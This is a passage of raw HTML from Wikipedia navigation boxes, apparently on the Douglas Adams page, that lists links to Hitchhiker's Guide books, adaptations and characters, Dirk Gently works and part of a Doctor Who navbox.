href=\"/wiki/Douglas_Adams%27s_Guide_to_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy\">Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Screenplays</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i>Monty Python's Flying Circus</i>\n<ul>\n<li>\"<a href=\"/wiki/Patient_Abuse\" title=\"Patient Abuse\">Patient Abuse</a>\"</li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the Trees</a></i></li>\n<li><i>Doctor Who</i>\n<ul>\n<li><i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i></li>\n<li><i><a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a></i></li>\n<li><i><a href=\"/wiki/Shada_(Doctor_Who)\" title=\"Shada (Doctor Who)\">Shada</a></i></li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">The Hitchhiker's Guide to the Galaxy</a></i> (TV series)</li>\n<li><i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">The Hitchhiker's Guide to the Galaxy</a></i> (film)</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Video games</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)\" title=\"The Hitchhiker's Guide to the Galaxy (video game)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/Bureaucracy_(video_game)\" title=\"Bureaucracy (video game)\">Bureaucracy</a></i></li>\n<li><i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">See also</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i> (series)</li>\n<li><i><a href=\"/wiki/Douglas_Adams_at_the_BBC\" title=\"Douglas Adams at the BBC\">Douglas Adams at the BBC</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Future\" title=\"The Hitchhiker's Guide to the Future\">The Hitchhiker's Guide to the Future</a></i> (BBC radio series)</li>\n<li><i><a href=\"/wiki/The_Utterly_Utterly_Merry_Comic_Relief_Christmas_Book\" title=\"The Utterly Utterly Merry Comic Relief Christmas Book\">The Utterly Utterly Merry Comic Relief Christmas Book</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Douglas_Adams.27s_The_Hitchhiker.27s_Guide_to_the_Galaxy\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Template:The Hitchhiker's Guide to the Galaxy\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Template talk:The Hitchhiker's Guide to the Galaxy\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:The_Hitchhiker%27s_Guide_to_the_Galaxy&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Douglas_Adams.27s_The_Hitchhiker.27s_Guide_to_the_Galaxy\" style=\"font-size:114%\"><strong class=\"selflink\">Douglas Adams's</strong> <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Books</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Main series</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(novel)\" title=\"The Hitchhiker's Guide to the Galaxy (novel)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i></li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i></li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i></li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Related works</div>\n</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li>\"<a href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a>\"</li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">by <a href=\"/wiki/Eoin_Colfer\" title=\"Eoin Colfer\">Eoin Colfer</a></div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"><i><a href=\"/wiki/And_Another_Thing..._(novel)\" title=\"And Another Thing... (novel)\">And Another Thing...</a></i></div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Media</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">Radio series</a>\n<ul>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">Phases 1 & 2</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">Phases 3, 4 & 5</a></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Original Radio Scripts</a></i></li>\n</ul>\n</li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">TV series</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">Film</a></li>\n<li><a href=\"/wiki/Timeline_of_The_Hitchhiker%27s_Guide_to_the_Galaxy_versions\" title=\"Timeline of The Hitchhiker's Guide to the Galaxy versions\">Timeline of <i>The Hitchhiker's Guide to the Galaxy</i> versions</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_cast_lists\" title=\"The Hitchhiker's Guide to the Galaxy cast lists\">Cast lists</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Games</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)\" title=\"The Hitchhiker's Guide to the Galaxy (video game)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Companion<br />\nmedia</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Don%27t_Panic:_The_Official_Hitchhiker%27s_Guide_to_the_Galaxy_Companion\" title=\"Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion\">Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion</a></i></li>\n<li><i><a href=\"/wiki/Douglas_Adams%27s_Guide_to_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy\">Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Characters</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Arthur_Dent\" title=\"Arthur Dent\">Arthur Dent</a></li>\n<li><a href=\"/wiki/Ford_Prefect_(character)\" title=\"Ford Prefect (character)\">Ford Prefect</a></li>\n<li><a href=\"/wiki/Zaphod_Beeblebrox\" title=\"Zaphod Beeblebrox\">Zaphod Beeblebrox</a></li>\n<li><a href=\"/wiki/Marvin_(character)\" title=\"Marvin (character)\">Marvin the Paranoid Android</a></li>\n<li><a href=\"/wiki/Trillian_(character)\" title=\"Trillian (character)\">Trillian</a></li>\n<li><a href=\"/wiki/Slartibartfast\" title=\"Slartibartfast\">Slartibartfast</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(fictional)\" title=\"The Hitchhiker's Guide to the Galaxy (fictional)\">The <i>Guide</i></a></li>\n<li><a href=\"/wiki/List_of_minor_The_Hitchhiker%27s_Guide_to_the_Galaxy_characters\" title=\"List of minor The Hitchhiker's Guide to the Galaxy characters\">Minor characters</a></li>\n<li><a href=\"/wiki/List_of_races_and_species_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"List of races and species in The Hitchhiker's Guide to the Galaxy\">Races and species</a></li>\n<li><a href=\"/wiki/Vogon\" title=\"Vogon\">Vogons</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Miscellanea</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Phrases_from_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Phrases from The Hitchhiker's Guide to the Galaxy\">Phrases</a></li>\n<li><a href=\"/wiki/Places_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Places in The Hitchhiker's Guide to the Galaxy\">Places</a></li>\n<li><a href=\"/wiki/Technology_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Technology in The Hitchhiker's Guide to the Galaxy\">Technology</a></li>\n<li><a href=\"/wiki/Somebody_else%27s_problem\" title=\"Somebody else's problem\">Somebody else's problem</a></li>\n<li><i><a href=\"/wiki/Encyclopedia_Galactica\" title=\"Encyclopedia Galactica\">Encyclopedia Galactica</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">In culture</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a></li>\n<li><a href=\"/wiki/Hitchcon\" title=\"Hitchcon\">Hitchcon</a></li>\n<li><a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a></li>\n<li>\"<a href=\"/wiki/Journey_of_the_Sorcerer\" class=\"mw-redirect\" title=\"Journey of the Sorcerer\">Journey of the Sorcerer</a>\"</li>\n<li><a href=\"/wiki/18610_Arthurdent\" title=\"18610 Arthurdent\">18610 Arthurdent</a></li>\n<li><a href=\"/wiki/25924_Douglasadams\" title=\"25924 Douglasadams\">25924 Douglasadams</a></li>\n<li><i><a href=\"/wiki/Bidenichthys_beeblebroxi\" title=\"Bidenichthys beeblebroxi\">Bidenichthys beeblebroxi</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow hlist\" colspan=\"2\">\n<div>\n<ul>\n<li><a href=\"/wiki/Portal:Hitchhiker%27s\" title=\"Portal:Hitchhiker's\">Portal</a></li>\n<li><a href=\"/wiki/Category:The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Category:The Hitchhiker's Guide to the Galaxy\">Category</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Dirk_Gently\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"3\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Dirk_Gently\" title=\"Template:Dirk Gently\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/w/index.php?title=Template_talk:Dirk_Gently&action=edit&redlink=1\" class=\"new\" title=\"Template talk:Dirk Gently (page does not exist)\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Dirk_Gently&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Dirk_Gently\" style=\"font-size:114%\"><a href=\"/wiki/Dirk_Gently\" title=\"Dirk Gently\">Dirk Gently</a></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow\" colspan=\"3\">\n<div>By <strong class=\"selflink\">Douglas Adams</strong></div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Novels</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i></li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i></li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> (unfinished)</li>\n</ul>\n</div>\n</td>\n<td class=\"navbox-image\" rowspan=\"5\" style=\"width:0%;padding:0px 0px 0px 2px\">\n<div><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/74/Dirk_Gently%27s_Holistic_Detective_Agency.svg/150px-Dirk_Gently%27s_Holistic_Detective_Agency.svg.png\" width=\"150\" height=\"113\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/74/Dirk_Gently%27s_Holistic_Detective_Agency.svg/225px-Dirk_Gently%27s_Holistic_Detective_Agency.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/7/74/Dirk_Gently%27s_Holistic_Detective_Agency.svg/300px-Dirk_Gently%27s_Holistic_Detective_Agency.svg.png 2x\" data-file-width=\"512\" data-file-height=\"384\" /></div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Adaptations</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Radio</div>\n</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency_(radio_serial)\" class=\"mw-redirect\" title=\"Dirk Gently's Holistic Detective Agency (radio serial)\">Dirk Gently's Holistic Detective Agency</a></i></li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul_(radio_serial)\" title=\"The Long Dark Tea-Time of the Soul (radio serial)\">The Long Dark Tea-Time of the Soul</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Theatre</div>\n</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"><i><a href=\"/wiki/Dirk_(play)\" title=\"Dirk (play)\">Dirk</a></i></div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Television</div>\n</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Dirk_Gently_(TV_series)\" title=\"Dirk Gently (TV series)\">Dirk Gently</a></i>\n<ul>\n<li>\"<a href=\"/wiki/Pilot_(Dirk_Gently)\" title=\"Pilot (Dirk Gently)\">Pilot</a>\"</li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency_(TV_series)\" title=\"Dirk Gently's Holistic Detective Agency (TV series)\">Dirk Gently's Holistic Detective Agency</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Related</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/St._Cedd%27s_College,_Cambridge\" title=\"St. Cedd's College, Cambridge\">St. Cedd's College</a></li>\n<li><i><a href=\"/wiki/Douglas_Adams_at_the_BBC\" title=\"Douglas Adams at the BBC\">Douglas Adams at the BBC</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Doctor_Who\" style=\"padding:3px\">\n<table class=\"nowraplinks hlist collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Doctor_Who\" title=\"Template:Doctor Who\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Doctor_Who\" title=\"Template talk:Doctor Who\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Doctor_Who&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Doctor_Who\" style=\"font-size:114%\"><i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Pages</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Characters</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/The_Doctor_(Doctor_Who)\" title=\"The Doctor (Doctor Who)\">The Doctor</a></li>\n<li><a href=\"/wiki/Companion_(Doctor_Who)\" title=\"Companion (Doctor Who)\">Companions</a></li>\n<li><a href=\"/wiki/Time_Lord\" title=\"Time Lord\">Time Lords</a></li>\n<li><a href=\"/wiki/Dalek\" title=\"Dalek\">Daleks</a></li>\n<li><a href=\"/wiki/Cyberman\" title=\"Cyberman\">Cybermen</a></li>\n<li><a href=\"/wiki/The_Master_(Doctor_Who)\" title=\"The Master (Doctor Who)\">The Master</a></li>\n<li><a href=\"/wiki/Slitheen\" title=\"Slitheen\">Slitheen</a></li>\n<li><a href=\"/wiki/Sontaran\" title=\"Sontaran\">Sontarans</a></li>\n<li><a href=\"/wiki/Weeping_Angel\" title=\"Weeping Angel\">Weeping Angels</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Concepts</div>\n</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/TARDIS\" title=\"TARDIS\">TARDIS</a></li>\n<li><a href=\"/wiki/Regeneration_(Doctor_Who)\" title=\"Regeneration (Doctor Who)\">Regeneration</a></li>\n<li><a href=\"/wiki/Sonic_screwdriver\" title=\"Sonic screwdriver\">Sonic screwdriver</a></li>\n<li><a href=\"/wiki/Time_vortex_(Doctor_Who)\" title=\"Time vortex (Doctor Who)\">Time Vortex</a></li>\n<li><a href=\"/wiki/Time_War_(Doctor_Who)\" title=\"Time War (Doctor Who)\">Time War</a></li>\n<li><a href=\"/wiki/Blinovitch_Limitation_Effect\" title=\"Blinovitch Limitation Effect\">Blinovitch Limitation Effect</a></li>\n<li><a href=\"/wiki/Whoniverse\" title=\"Whoniverse\">Whoniverse</a></li>\n<li><a href=\"/wiki/Torchwood_Institute\" title=\"Torchwood Institute\">Torchwood Institute</a></li>\n<li><a href=\"/wiki/UNIT\" title=\"UNIT\">UNIT</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Miscellaneous</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/History_of_Doctor_Who\" title=\"History of Doctor Who\">History</a></li>\n<li><a href=\"/wiki/Doctor_Who_missing_episodes\" title=\"Doctor Who missing episodes\">Missing episodes</a></li>\n<li><a href=\"/wiki/Doctor_Who_music\" title=\"Doctor Who music\">Music</a></li>\n<li><a href=\"/wiki/Doctor_Who_theme_music\" title=\"Doctor Who theme music\">Theme music</a></li>\n<li><a href=\"/wiki/Doctor_Who_in_Canada_and_the_United_States\" title=\"Doctor Who in Canada and the United States\"><i>Doctor Who</i> in Canada and the U.S.</a></li>\n<li><a href=\"/wiki/Doctor_Who_in_Australia\" title=\"Doctor Who in Australia\"><i>Doctor Who</i> in Australia</a></li>\n<li><a href=\"/wiki/Doctor_Who_fandom\" title=\"Doctor Who fandom\">Fandom</a></li>\n<li><a href=\"/wiki/Doctor_Who_merchandise\" title=\"Doctor Who merchandise\">Merchandise</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Lists</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Production</div>\n</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/List_of_Doctor_Who_serials\" title=\"List of Doctor Who serials\">Serials</a>\n<ul>\n<li><a href=\"/wiki/List_of_unmade_Doctor_Who_serials_and_films\" title=\"List of unmade Doctor Who serials and films\">unmade</a></li>\n</ul>\n</li>\n<li><a href=\"/wiki/List_of_special_Doctor_Who_episodes\" title=\"List of special Doctor Who episodes\">Special 